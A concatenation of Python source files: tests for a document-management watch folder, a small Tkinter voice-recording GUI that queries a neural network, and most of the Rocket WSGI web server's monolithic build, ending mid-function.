self.assertEqual(document.file_mimetype, 'image/png')
self.assertEqual(document.file_mime_encoding, 'binary')
self.assertEqual(document.label, TEST_SMALL_DOCUMENT_FILENAME)
self.assertEqual(document.page_count, 1)
def test_issue_gh_163(self):
"""
Non-ASCII chars in document name failing in upload via watch folder
gh-issue #163 https://github.com/mayan-edms/mayan-edms/issues/163
"""
self._create_test_watchfolder()
shutil.copy(
src=TEST_NON_ASCII_DOCUMENT_PATH, dst=self.temporary_directory
)
self.test_watch_folder.check_source()
self.assertEqual(Document.objects.count(), 1)
document = Document.objects.first()
self.assertEqual(document.exists(), True)
self.assertEqual(document.size, 17436)
self.assertEqual(document.file_mimetype, 'image/png')
self.assertEqual(document.file_mime_encoding, 'binary')
self.assertEqual(document.label, TEST_NON_ASCII_DOCUMENT_FILENAME)
self.assertEqual(document.page_count, 1)
def test_issue_gh_163_expanded(self):
"""
Test Non-ASCII named documents inside Non-ASCII named compressed file
"""
self._create_test_watchfolder()
shutil.copy(
src=TEST_NON_ASCII_COMPRESSED_DOCUMENT_PATH,
dst=self.temporary_directory
)
self.test_watch_folder.check_source()
self.assertEqual(Document.objects.count(), 1)
document = Document.objects.first()
self.assertEqual(document.exists(), True)
self.assertEqual(document.size, 17436)
self.assertEqual(document.file_mimetype, 'image/png')
self.assertEqual(document.file_mime_encoding, 'binary')
self.assertEqual(document.label, TEST_NON_ASCII_DOCUMENT_FILENAME)
self.assertEqual(document.page_count, 1)
def test_locking_support(self):
self._create_test_watchfolder()
shutil.copy(
src=TEST_SMALL_DOCUMENT_PATH, dst=self.temporary_directory
)
path_test_file = Path(
self.temporary_directory, TEST_SMALL_DOCUMENT_FILENAME
)
with path_test_file.open(mode='rb+') as file_object:
fcntl.lockf(file_object, fcntl.LOCK_EX | fcntl.LOCK_NB)
process = Process(target=self.test_watch_folder.check_source)
process.start()
process.join()
self.assertEqual(Document.objects.count(), 0)
class SourceModelTestCase(SourceTestMixin, GenericDocumentTestCase):
auto_upload_test_document = False
def setUp(self):
super().setUp()
self.document_version_storage_instance = storage_document_versions.get_storage_instance()
def _get_document_version_storage_file_count(self):
return len(
self.document_version_storage_instance.listdir(path='')[1]
)
def test_single_storage_file_creation(self):
document_version_file_count = self._get_document_version_storage_file_count()
with open(TEST_SMALL_DOCUMENT_PATH, mode='rb') as file_object:
self.test_source.handle_upload(
file_object=file_object,
document_type=self.test_document_type
)
self.assertEqual(
self._get_document_version_storage_file_count(),
document_version_file_count + 1
)
|
main.py
|
from Tkinter import *
from threading import Thread
from record import record_to_file
from features import mfcc
from anntester_single import *
import scipy.io.wavfile as wav
class Application(Frame):
def createWidgets(self):
self.button_image = PhotoImage(file="button.gif")
self.RECORD = Button(self, image=self.button_image, width="100", height="100", command=self.record_buttonpress)
self.RECORD.pack()
self.TEXTBOX = Text(self, height="1", width="30")
self.TEXTBOX.pack()
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack()
self.createWidgets()
self.TEXTBOX.insert(INSERT, "Press to record")
self.TEXTBOX.tag_config("recording", foreground="red", justify="center")
self.TEXTBOX.tag_config("success", foreground="darkgreen", justify="center")
self.TEXTBOX.configure(state="disabled")
def record_buttonpress(self):
recorder_thread = Thread(target=record_and_test, args=(self.TEXTBOX, self.RECORD))
recorder_thread.start()
def record_and_test(textbox, button, filename="test_files/test.wav"):
# Disable button and change text
button.configure(state="disabled")
textbox.configure(state="normal")
textbox.delete("1.0", END)
textbox.insert(INSERT, "Recording")
textbox.tag_add("recording", "1.0", END)
textbox.configure(state="disabled")
# Record to file
record_to_file(filename)
# Feed into ANN
testNet = testInit()
inputArray = extractFeature(filename)
print len(inputArray)
outStr = feedToNetwork(inputArray,testNet)
# Change text and re-enable button
textbox.configure(state="normal")
textbox.delete("1.0", END)
textbox.tag_remove("recording", "1.0")
textbox.insert(INSERT, outStr)
textbox.tag_add("success", "1.0", END)
textbox.configure(state="disabled")
button.configure(state="normal")
if __name__ == '__main__':
# Display GUI
root = Tk()
app = Application(master=root)
app.mainloop()
#root.destroy()
|
rocket.py
|
# -*- coding: utf-8 -*-
# This file is part of the Rocket Web Server
# Copyright (c) 2011 Timothy Farrell
# Modified by Massimo Di Pierro
# Import System Modules
import sys
import errno
import socket
import logging
import platform
# Define Constants
VERSION = '1.2.6'
SERVER_NAME = socket.gethostname()
SERVER_SOFTWARE = 'Rocket %s' % VERSION
HTTP_SERVER_SOFTWARE = '%s Python/%s' % (
SERVER_SOFTWARE, sys.version.split(' ')[0])
BUF_SIZE = 16384
SOCKET_TIMEOUT = 10 # in secs
THREAD_STOP_CHECK_INTERVAL = 1 # in secs, How often should threads check for a server stop message?
IS_JYTHON = platform.system() == 'Java' # Handle special cases for Jython
IGNORE_ERRORS_ON_CLOSE = set([errno.ECONNABORTED, errno.ECONNRESET])
DEFAULT_LISTEN_QUEUE_SIZE = 5
DEFAULT_MIN_THREADS = 10
DEFAULT_MAX_THREADS = 0
DEFAULTS = dict(LISTEN_QUEUE_SIZE=DEFAULT_LISTEN_QUEUE_SIZE,
MIN_THREADS=DEFAULT_MIN_THREADS,
MAX_THREADS=DEFAULT_MAX_THREADS)
PY3K = sys.version_info[0] > 2
class NullHandler(logging.Handler):
"A Logging handler to prevent library errors."
def emit(self, record):
pass
if PY3K:
def b(val):
""" Convert string/unicode/bytes literals into bytes. This allows for
the same code to run on Python 2.x and 3.x. """
if isinstance(val, str):
return val.encode()
else:
return val
def u(val, encoding="us-ascii"):
""" Convert bytes into string/unicode. This allows for the
same code to run on Python 2.x and 3.x. """
if isinstance(val, bytes):
return val.decode(encoding)
else:
return val
else:
def b(val):
""" Convert string/unicode/bytes literals into bytes. This allows for
the same code to run on Python 2.x and 3.x. """
if isinstance(val, unicode):
return val.encode()
else:
return val
def u(val, encoding="us-ascii"):
""" Convert bytes into string/unicode. This allows for the
same code to run on Python 2.x and 3.x. """
if isinstance(val, str):
return val.decode(encoding)
else:
return val
# Import Package Modules
# package imports removed in monolithic build
__all__ = ['VERSION', 'SERVER_SOFTWARE', 'HTTP_SERVER_SOFTWARE', 'BUF_SIZE',
'IS_JYTHON', 'IGNORE_ERRORS_ON_CLOSE', 'DEFAULTS', 'PY3K', 'b', 'u',
'Rocket', 'CherryPyWSGIServer', 'SERVER_NAME', 'NullHandler']
# Monolithic build...end of module: rocket/__init__.py
# Monolithic build...start of module: rocket/connection.py
# Import System Modules
import sys
import time
import socket
try:
import ssl
has_ssl = True
except ImportError:
has_ssl = False
# Import Package Modules
# package imports removed in monolithic build
# TODO - This part is still very experimental.
#from .filelike import FileLikeSocket
class Connection(object):
__slots__ = [
'setblocking',
'sendall',
'shutdown',
'makefile',
'fileno',
'client_addr',
'client_port',
'server_port',
'socket',
'start_time',
'ssl',
'secure',
'recv',
'send',
'read',
'write'
]
def __init__(self, sock_tuple, port, secure=False):
self.client_addr, self.client_port = sock_tuple[1][:2]
self.server_port = port
self.socket = sock_tuple[0]
self.start_time = time.time()
self.ssl = has_ssl and isinstance(self.socket, ssl.SSLSocket)
self.secure = secure
if IS_JYTHON:
# In Jython we must set TCP_NODELAY here since it does not
# inherit from the listening socket.
# See: http://bugs.jython.org/issue1309
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.settimeout(SOCKET_TIMEOUT)
self.shutdown = self.socket.shutdown
self.fileno = self.socket.fileno
self.setblocking = self.socket.setblocking
self.recv = self.socket.recv
self.send = self.socket.send
self.makefile = self.socket.makefile
if sys.platform == 'darwin':
self.sendall = self._sendall_darwin
else:
self.sendall = self.socket.sendall
def _sendall_darwin(self, buf):
pending = len(buf)
offset = 0
while pending:
try:
sent = self.socket.send(buf[offset:])
pending -= sent
offset += sent
except socket.error:
import errno
info = sys.exc_info()
if info[1].args[0] != errno.EAGAIN:
raise
return offset
# FIXME - this is not ready for prime-time yet.
# def makefile(self, buf_size=BUF_SIZE):
# return FileLikeSocket(self, buf_size)
def close(self):
if hasattr(self.socket, '_sock'):
try:
self.socket._sock.close()
except socket.error:
info = sys.exc_info()
if info[1].args[0] != socket.EBADF:
raise info[1]
else:
pass
self.socket.close()
# Monolithic build...end of module: rocket/connection.py
# Monolithic build...start of module: rocket/filelike.py
# Import System Modules
import socket
try:
from io import StringIO
except ImportError:
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
# Import Package Modules
# package imports removed in monolithic build
class FileLikeSocket(object):
def __init__(self, conn, buf_size=BUF_SIZE):
self.conn = conn
self.buf_size = buf_size
self.buffer = StringIO()
self.content_length = None
if self.conn.socket.gettimeout() == 0.0:
self.read = self.non_blocking_read
else:
self.read = self.blocking_read
def __iter__(self):
return self
def recv(self, size):
while True:
try:
return self.conn.recv(size)
except socket.error:
exc = sys.exc_info()
e = exc[1]
# FIXME - Don't raise socket_errors_nonblocking or socket_error_eintr
if (e.args[0] not in set()):
raise
def next(self):
data = self.readline()
if data == '':
raise StopIteration
return data
def non_blocking_read(self, size=None):
# Shamelessly adapted from Cherrypy!
bufr = self.buffer
bufr.seek(0, 2)
if size is None:
while True:
data = self.recv(self.buf_size)
if not data:
break
bufr.write(data)
self.buffer = StringIO()
return bufr.getvalue()
else:
buf_len = self.buffer.tell()
if buf_len >= size:
bufr.seek(0)
data = bufr.read(size)
self.buffer = StringIO(bufr.read())
return data
self.buffer = StringIO()
while True:
remaining = size - buf_len
data = self.recv(remaining)
if not data:
break
n = len(data)
if n == size and not buf_len:
return data
if n == remaining:
bufr.write(data)
del data
break
bufr.write(data)
buf_len += n
del data
return bufr.getvalue()
def blocking_read(self, length=None):
if length is None:
if self.content_length is not None:
length = self.content_length
else:
length = 1
try:
data = self.conn.recv(length)
except:
data = b('')
return data
def readline(self):
data = b("")
char = self.read(1)
while char != b('\n') and char is not b(''):
line = repr(char)
data += char
char = self.read(1)
data += char
return data
def readlines(self, hint="ignored"):
return list(self)
def close(self):
self.conn = None
self.content_length = None
# Monolithic build...end of module: rocket/filelike.py
# Monolithic build...start of module: rocket/futures.py
# Import System Modules
import time
try:
from concurrent.futures import Future, ThreadPoolExecutor
from concurrent.futures.thread import _WorkItem
has_futures = True
except ImportError:
has_futures = False
class Future:
pass
class ThreadPoolExecutor:
pass
class _WorkItem:
pass
class WSGIFuture(Future):
def __init__(self, f_dict, *args, **kwargs):
Future.__init__(self, *args, **kwargs)
self.timeout = None
self._mem_dict = f_dict
self._lifespan = 30
self._name = None
self._start_time = time.time()
def set_running_or_notify_cancel(self):
if time.time() - self._start_time >= self._lifespan:
self.cancel()
else:
return super(WSGIFuture, self).set_running_or_notify_cancel()
def remember(self, name, lifespan=None):
self._lifespan = lifespan or self._lifespan
if name in self._mem_dict:
raise NameError('Cannot remember future by name "%s". ' % name +
'A future already exists with that name.')
self._name = name
self._mem_dict[name] = self
return self
def forget(self):
if self._name in self._mem_dict and self._mem_dict[self._name] is self:
del self._mem_dict[self._name]
self._name = None
class _WorkItem(object):
def __init__(self, future, fn, args, kwargs):
self.future = future
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
if not self.future.set_running_or_notify_cancel():
return
try:
result = self.fn(*self.args, **self.kwargs)
except BaseException:
e = sys.exc_info()[1]
self.future.set_exception(e)
else:
self.future.set_result(result)
class WSGIExecutor(ThreadPoolExecutor):
multithread = True
multiprocess = False
def __init__(self, *args, **kwargs):
ThreadPoolExecutor.__init__(self, *args, **kwargs)
self.futures = dict()
def submit(self, fn, *args, **kwargs):
if self._shutdown_lock.acquire():
if self._shutdown:
self._shutdown_lock.release()
raise RuntimeError(
'Cannot schedule new futures after shutdown')
f = WSGIFuture(self.futures)
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
self._adjust_thread_count()
self._shutdown_lock.release()
return f
else:
return False
class FuturesMiddleware(object):
"Futures middleware that adds a Futures Executor to the environment"
def __init__(self, app, threads=5):
self.app = app
self.executor = WSGIExecutor(threads)
def __call__(self, environ, start_response):
environ["wsgiorg.executor"] = self.executor
environ["wsgiorg.futures"] = self.executor.futures
return self.app(environ, start_response)
# Monolithic build...end of module: rocket/futures.py
# Monolithic build...start of module: rocket/listener.py
# Import System Modules
import os
import socket
import logging
import traceback
from threading import Thread
try:
import ssl
from ssl import SSLError
has_ssl = True
except ImportError:
has_ssl = False
class SSLError(socket.error):
pass
# Import Package Modules
# package imports removed in monolithic build
class Listener(Thread):
"""The Listener class is a class responsible for accepting connections
and queuing them to be processed by a worker thread."""
def __init__(self, interface, queue_size, active_queue, *args, **kwargs):
Thread.__init__(self, *args, **kwargs)
# Instance variables
self.active_queue = active_queue
self.interface = interface
self.addr = interface[0]
self.port = interface[1]
self.secure = len(interface) >= 4
self.clientcert_req = (len(interface) == 5 and interface[4])
self.thread = None
self.ready = False
# Error Log
self.err_log = logging.getLogger('Rocket.Errors.Port%i' % self.port)
self.err_log.addHandler(NullHandler())
# Build the socket
if ':' in self.addr:
listener = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not listener:
self.err_log.error("Failed to get socket.")
return
if self.secure:
if not has_ssl:
self.err_log.error("ssl module required to serve HTTPS.")
return
elif not os.path.exists(interface[2]):
data = (interface[2], interface[0], interface[1])
self.err_log.error("Cannot find key file "
"'%s'. Cannot bind to %s:%s" % data)
return
elif not os.path.exists(interface[3]):
data = (interface[3], interface[0], interface[1])
self.err_log.error("Cannot find certificate file "
"'%s'. Cannot bind to %s:%s" % data)
return
if self.clientcert_req and not os.path.exists(interface[4]):
data = (interface[4], interface[0], interface[1])
self.err_log.error("Cannot find root ca certificate file "
"'%s'. Cannot bind to %s:%s" % data)
return
# Set socket options
try:
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except:
msg = "Cannot share socket. Using %s:%i exclusively."
self.err_log.warning(msg % (self.addr, self.port))
try:
if not IS_JYTHON:
listener.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY,
1)
except:
msg = "Cannot set TCP_NODELAY, things might run a little slower"
self.err_log.warning(msg)
try:
listener.bind((self.addr, self.port))
except:
msg = "Socket %s:%i in use by other process and it won't share."
self.err_log.error(msg % (self.addr, self.port))
else:
# We want socket operations to timeout periodically so we can
# check if the server is shutting down
listener.settimeout(THREAD_STOP_CHECK_INTERVAL)
# Listen for new connections allowing queue_size number of
# connections to wait before rejecting a connection.
listener.listen(queue_size)
self.listener = listener
self.ready = True
def wrap_socket(self, sock):
try:
if self.clientcert_req:
ca_certs = self.interface[4]
cert_reqs = ssl.CERT_OPTIONAL
sock = ssl.wrap_socket(sock,
keyfile=self.interface[2],
certfile=self.interface[3],
server_side=True,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
ssl_version=ssl.PROTOCOL_SSLv23)
else:
sock = ssl.wrap_socket(sock,
keyfile=self.interface[2],
certfile=self.interface[3],
server_side=True,
ssl_version=ssl.PROTOCOL_SSLv23)
except SSLError:
# Generally this happens when an HTTP request is received on a
# secure socket. We don't do anything because it will be detected
# by Worker and dealt with appropriately.
pass
return sock
def start(self):
if not self.ready:
self.err_log.warning('Listener started when not ready.')
return
if self.thread is not None and self.thread.isAlive():
self.err_log.warning('Listener already running.')
return
self.thread = Thread(target=self.listen, name="Port" + str(self.port))
self.thread.start()
def isAlive(self):
if self.thread is None:
return False
return self.thread.isAlive()
def join(self):
if self.thread is None:
return
self.ready = False
self.thread.join()
del self.thread
self.thread = None
self.ready = True
def listen(self):
if __debug__:
self.err_log.debug('Entering main loop.')
while True:
try:
sock, addr = self.listener.accept()
if self.secure:
sock = self.wrap_socket(sock)
self.active_queue.put(((sock, addr),
self.interface[1],
self.secure))
except socket.timeout:
# socket.timeout will be raised every
# THREAD_STOP_CHECK_INTERVAL seconds. When that happens,
# we check if it's time to die.
if not self.ready:
if __debug__:
self.err_log.debug('Listener exiting.')
return
else:
continue
except:
self.err_log.error(traceback.format_exc())
# Monolithic build...end of module: rocket/listener.py
# Monolithic build...start of module: rocket/main.py
# Import System Modules
import sys
import time
import socket
import logging
import traceback
from threading import Lock
try:
from queue import Queue
except ImportError:
from Queue import Queue
# Import Package Modules
# package imports removed in monolithic build
# Setup Logging
log = logging.getLogger('Rocket')
log.addHandler(NullHandler())
class Rocket(object):
"""The Rocket class is responsible for handling threads and accepting and
dispatching connections."""
def __init__(self,
interfaces=('127.0.0.1', 8000),
method='wsgi',
app_info=None,
min_threads=None,
max_threads=None,
queue_size=None,
timeout=600,
handle_signals=True):
self.handle_signals = handle_signals
self.startstop_lock = Lock()
self.timeout = timeout
if not isinstance(interfaces, list):
self.interfaces = [interfaces]
else:
self.interfaces = interfaces
if min_threads is None:
min_threads = DEFAULTS['MIN_THREADS']
if max_threads is None:
max_threads = DEFAULTS['MAX_THREADS']
if not queue_size:
if hasattr(socket, 'SOMAXCONN'):
queue_size = socket.SOMAXCONN
else:
queue_size = DEFAULTS['LISTEN_QUEUE_SIZE']
if max_threads and queue_size > max_threads:
queue_size = max_threads
if isinstance(app_info, dict):
app_info['server_software'] = SERVER_SOFTWARE
self.monitor_queue = Queue()
self.active_queue = Queue()
self._threadpool = ThreadPool(get_method(method),
app_info=app_info,
active_queue=self.active_queue,
monitor_queue=self.monitor_queue,
min_threads=min_threads,
max_threads=max_threads)
# Build our socket listeners
self.listeners = [Listener(
i, queue_size, self.active_queue) for i in self.interfaces]
for ndx in range(len(self.listeners) - 1, 0, -1):
if not self.listeners[ndx].ready:
del self.listeners[ndx]
if not self.listeners:
log.critical("No interfaces to listen on...closing.")
sys.exit(1)
def _sigterm(self, signum, frame):
log.info('Received SIGTERM')
self.stop()
def _sighup(self, signum, frame):
log.info('Received SIGHUP')
self.restart()
def start(self, background=False):
log.info('Starting %s' % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Set up our shutdown signals
if self.handle_signals:
try:
import signal
signal.signal(signal.SIGTERM, self._sigterm)
signal.signal(signal.SIGUSR1, self._sighup)
except:
log.debug('This platform does not support signals.')
# Start our worker threads
self._threadpool.start()
# Start our monitor thread
self._monitor = Monitor(self.monitor_queue,
self.active_queue,
self.timeout,
self._threadpool)
self._monitor.setDaemon(True)
self._monitor.start()
# I know that EXPR and A or B is bad but I'm keeping it for Py2.4
# compatibility.
str_extract = lambda l: (l.addr, l.port, l.secure and '*' or '')
msg = 'Listening on sockets: '
msg += ', '.join(
['%s:%i%s' % str_extract(l) for l in self.listeners])
log.info(msg)
for l in self.listeners:
l.start()
finally:
self.startstop_lock.release()
if background:
return
while self._monitor.isAlive():
try:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
except KeyboardInterrupt:
# Capture a keyboard interrupt when running from a console
break
except:
if self._monitor.isAlive():
log.error(traceback.format_exc())
continue
return self.stop()
def stop(self, stoplogging=False):
log.info('Stopping %s' % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Stop listeners
for l in self.listeners:
l.ready = False
# Encourage a context switch
time.sleep(0.01)
for l in self.listeners:
if l.isAlive():
l.join()
# Stop Monitor
self._monitor.stop()
if self._monitor.isAlive():
self._monitor.join()
# Stop Worker threads
self._threadpool.stop()
if stoplogging:
logging.shutdown()
msg = "Calling logging.shutdown() is now the responsibility of \
the application developer. Please update your \
applications to no longer call rocket.stop(True)"
try:
import warnings
raise warnings.DeprecationWarning(msg)
except ImportError:
raise RuntimeError(msg)
finally:
self.startstop_lock.release()
def restart(self):
self.stop()
self.start()
def CherryPyWSGIServer(bind_addr,
wsgi_app,
numthreads=10,
server_name=None,
max=-1,
request_queue_size=5,
timeout=10,
shutdown_timeout=5):
""" A Cherrypy wsgiserver-compatible wrapper. """
max_threads = max
if max_threads < 0:
max_threads = 0
return Rocket(bind_addr, 'wsgi', {'wsgi_app': wsgi_app},
min_threads=numthreads,
max_threads=max_threads,
queue_size=request_queue_size,
timeout=timeout)
# Monolithic build...end of module: rocket/main.py
# Monolithic build...start of module: rocket/monitor.py
# Import System Modules
import time
import logging
import select
from threading import Thread
# Import Package Modules
# package imports removed in monolithic build
class Monitor(Thread):
# Monitor worker class.
def __init__(self,
monitor_queue,
active_queue,
timeout,
threadpool,
*args,
**kwargs):
Thread.__init__(self, *args, **kwargs)
self._threadpool = threadpool
# Instance Variables
self.monitor_queue = monitor_queue
self.active_queue = active_queue
self.timeout = timeout
self.log = logging.getLogger('Rocket.Monitor')
self.log.addHandler(NullHandler())
self.connections = set()
self.active = False
def run(self):
self.active = True
conn_list = list()
list_changed = False
# We need to make sure the queue is empty before we start
while not self.monitor_queue.empty():
self.monitor_queue.get()
if __debug__:
self.log.debug('Entering monitor loop.')
# Enter thread main loop
while self.active:
# Move the queued connections to the selection pool
while not self.monitor_queue.empty():
if __debug__:
self.log.debug('In "receive timed-out connections" loop.')
c = self.monitor_queue.get()
if c is None:
# A non-client is a signal to die
if __debug__:
self.log.debug('Received a death threat.')
self.stop()
break
self.log.debug('Received a timed out connection.')
if __debug__:
assert(c not in self.connections)
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it.
c.setblocking(False)
if __debug__:
self.log.debug('Adding connection to monitor list.')
self.connections.add(c)
list_changed = True
# Wait on those connections
if list_changed:
conn_list = list(self.connections)
list_changed = False
try:
if len(conn_list):
readable = select.select(conn_list,
[],
[],
THREAD_STOP_CHECK_INTERVAL)[0]
else:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
readable = []
if not self.active:
break
# If we have any readable connections, put them back
for r in readable:
if __debug__:
self.log.debug('Restoring readable connection')
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it, but the rest of the code requires
# that it be in blocking mode.
r.setblocking(True)
r.start_time = time.time()
self.active_queue.put(r)
self.connections.remove(r)
list_changed = True
except:
if self.active:
raise
else:
break
# If we have any stale connections, kill them off.
if self.timeout:
now = time.time()
stale = set()
for c in self.connections:
if (now - c.start_time) >= self.timeout:
stale.add(c)
for c in stale:
if __debug__:
# "EXPR and A or B" kept for Py2.4 compatibility
data = (
c.client_addr, c.server_port, c.ssl and '*' or '')
self.log.debug(
'Flushing stale connection: %s:%i%s' % data)
self.connections.remove(c)
list_changed = True
try:
c.close()
finally:
del c
# Dynamically resize the threadpool to adapt to our changing needs.
self._threadpool.dynamic_resize()
def stop(self):
self.active = False
if __debug__:
self.log.debug('Flushing waiting connections')
while self.connections:
c = self.connections.pop()
try:
c.close()
finally:
del c
if __debug__:
self.log.debug('Flushing queued connections')
while not self.monitor_queue.empty():
c = self.monitor_queue.get()
if c is None:
continue
try:
c.close()
finally:
del c
# Place a None sentry value to cause the monitor to die.
self.monitor_queue.put(None)
# Monolithic build...end of module: rocket/monitor.py
# Monolithic build...start of module: rocket/threadpool.py
# Import System Modules
import logging
# Import Package Modules
# package imports removed in monolithic build
# Setup Logging
log = logging.getLogger('Rocket.Errors.ThreadPool')
log.addHandler(NullHandler())
class ThreadPool:
"""The ThreadPool class is a container class for all the worker threads. It
manages the number of actively running threads."""
def __init__(self,
method,
app_info,
active_queue,
monitor_queue,
min_threads=DEFAULTS['MIN_THREADS'],
max_threads=DEFAULTS['MAX_THREADS'],
):
if __debug__:
log.debug("Initializing ThreadPool.")
self.check_for_dead_threads = 0
self.active_queue = active_queue
self.worker_class = method
self.min_threads = min_threads
self.max_threads = max_threads
self.monitor_queue = monitor_queue
self.stop_server = False
self.alive = False
# TODO - Optimize this based on some real-world usage data
self.grow_threshold = int(max_threads / 10) + 2
if not isinstance(app_info, dict):
app_info = dict()
if has_futures and app_info.get('futures'):
app_info['executor'] = WSGIExecutor(max([DEFAULTS['MIN_THREADS'],
2]))
app_info.update(max_threads=max_threads,
min_threads=min_threads)
self.min_threads = min_threads
self.app_info = app_info
self.threads = set()
def start(self):
self.stop_server = False
if __debug__:
log.debug("Starting threads.")
self.grow(self.min_threads)
self.alive = True
def stop(self):
self.alive = False
if __debug__:
log.debug("Stopping threads.")
self.stop_server = True
# Prompt the threads to die
self.shrink(len(self.threads))
# Stop futures initially
if has_futures and self.app_info.get('futures'):
if __debug__:
log.debug("Future executor is present. Python will not "
"exit until all jobs have finished.")
self.app_info['executor'].shutdown(wait=False)
# Give them the gun
#active_threads = [t for t in self.threads if t.isAlive()]
#while active_threads:
# t = active_threads.pop()
# t.kill()
# Wait until they pull the trigger
for t in self.threads:
if t.isAlive():
t.join()
# Clean up the mess
self.bring_out_your_dead()
def bring_out_your_dead(self):
# Remove dead threads from the pool
dead_threads = [t for t in self.threads if not t.isAlive()]
for t in dead_threads:
if __debug__:
log.debug("Removing dead thread: %s." % t.getName())
try:
# Py2.4 complains here so we put it in a try block
self.threads.remove(t)
except:
pass
self.check_for_dead_threads -= len(dead_threads)
def grow(self, amount=None):
if self.stop_server:
return
if not amount:
amount = self.max_threads
if self.alive:
amount = min([amount, self.max_threads - len(self.threads)])
if __debug__:
log.debug("Growing by %i." % amount)
for x in range(amount):
worker = self.worker_class(self.app_info,
self.active_queue,
self.monitor_queue)
worker.setDaemon(True)
self.threads.add(worker)
worker.start()
def shrink(self, amount=1):
if __debug__:
log.debug("Shrinking by %i." % amount)
self.check_for_dead_threads += amount
for x in range(amount):
self.active_queue.put(None)
def dynamic_resize(self):
if (self.max_threads > self.min_threads or self.max_threads == 0):
if self.check_for_dead_threads > 0:
self.bring_out_your_dead()
queueSize = self.active_queue.qsize()
threadCount = len(self.threads)
if __debug__:
log.debug("Examining ThreadPool. %i threads and %i Q'd conxions"
% (threadCount, queueSize))
if queueSize == 0 and threadCount > self.min_threads:
self.shrink()
elif queueSize > self.grow_threshold:
self.grow(queueSize)
# Monolithic build...end of module: rocket/threadpool.py
# Monolithic build...start of module: rocket/worker.py
# Import System Modules
import re
import sys
import socket
import logging
import traceback
from wsgiref.headers import Headers
from threading import Thread
from datetime import datetime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
try:
from io import StringIO
except ImportError:
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
from ssl import SSLError
except ImportError:
class SSLError(socket.error):
pass
# Import Package Modules
# package imports removed in monolithic build
# Define Constants
re_SLASH = re.compile('%2F', re.IGNORECASE)
re_REQUEST_LINE = re.compile(r"""^
(?P<method>OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT) # Request Method
\ # (single space)
(
(?P<scheme>[^:/]+) # Scheme
(://) #
(?P<host>[^/]+) # Host
)? #
(?P<path>(\*|/[^ \?]*)) # Path
(\? (?P<query_string>[^ ]*))? # Query String
\ # (single space)
(?P<protocol>HTTPS?/1\.[01]) # Protocol
$
""", re.X)
LOG_LINE = '%(client_ip)s - "%(request_line)s" - %(status)s %(size)s'
RESPONSE = '''\
%s %s
Content-Length: %i
Content-Type: %s
%s
'''
if IS_JYTHON:
HTTP_METHODS = set(['OPTIONS', 'GET', 'HEAD', 'POST', 'PUT',
'DELETE', 'TRACE', 'CONNECT'])
class Worker(Thread):
"""The Worker class is a base class responsible for receiving connections
and (a subclass) will run an application to process the the connection """
def __init__(self,
app_info,
active_queue,
monitor_queue,
*args,
**kwargs):
Thread.__init__(self, *args, **kwargs)
# Instance Variables
self.app_info = app_info
self.active_queue = active_queue
self.monitor_queue = monitor_queue
self.size = 0
self.status = "200 OK"
self.closeConnection = True
self.request_line = ""
self.protocol = 'HTTP/1.1'
# Request Log
self.req_log = logging.getLogger('Rocket.Requests')
self.req_log.addHandler(NullHandler())
# Error Log
self.err_log = logging.getLogger('Rocket.Errors.' + self.getName())
self.err_log.addHandler(NullHandler())
def _handleError(self, typ, val, tb):
if typ == SSLError:
if 'timed out' in str(val.args[0]):
typ = SocketTimeout
if typ == SocketTimeout:
if __debug__:
self.err_log.debug('Socket timed out')
self.monitor_queue.put(self.conn)
return True
if typ == SocketClosed:
self.closeConnection = True
if __debug__:
self.err_log.debug('Client closed socket')
return False
if typ == BadRequest:
self.closeConnection = True
if __debug__:
self.err_log.debug('Client sent a bad request')
return True
if typ == socket.error:
self.closeConnection = True
if val.args[0] in IGNORE_ERRORS_ON_CLOSE:
if __debug__:
self.err_log.debug('Ignorable socket Error received...'
'closing connection.')
return False
else:
self.status = "999 Utter Server Failure"
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error('Unhandled Error when serving '
'connection:\n' + '\n'.join(tb_fmt))
return False
self.closeConnection = True
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error('\n'.join(tb_fmt))
self.send_response('500 Server Error')
return False
def run(self):
if __debug__:
self.err_log.debug('Entering main loop.')
# Enter thread main loop
while True:
conn = self.active_queue.get()
if not conn:
# A non-client is a signal to die
if __debug__:
self.err_log.debug('Received a death threat.')
return conn
if isinstance(conn, tuple):
conn = Connection(*conn)
self.conn = conn
if conn.ssl != conn.secure:
self.err_log.info('Received HTTP connection on HTTPS port.')
self.send_response('400 Bad Request')
self.closeConnection = True
conn.close()
continue
else:
if __debug__:
self.err_log.debug('Received a connection.')
self.closeConnection = False
# Enter connection serve loop
while True:
if __debug__:
self.err_log.debug('Serving a request')
try:
self.run_app(conn)
except:
exc = sys.exc_info()
handled = self._handleError(*exc)
if handled:
break
finally:
if self.request_line:
log_info = dict(client_ip=conn.client_addr,
time=datetime.now().strftime('%c'),
status=self.status.split(' ')[0],
size=self.size,
request_line=self.request_line)
self.req_log.info(LOG_LINE % log_info)
if self.closeConnection:
try:
conn.close()
except:
self.err_log.error(str(traceback.format_exc()))
break
def run_app(self, conn):
# Must be overridden with a method reads the request from the socket
# and sends a response.
self.closeConnection = True
raise NotImplementedError('Overload this method!')
def send_response(self, status):
stat_msg = status.split(' ', 1)[1]
msg = RESPONSE % (self.protocol,
status,
len(stat_msg),
'text/plain',
stat_msg)
try:
self.conn.sendall(b(msg))
except socket.timeout:
self.closeConnection = True
msg = 'Tried to send "%s" to client but received timeout error'
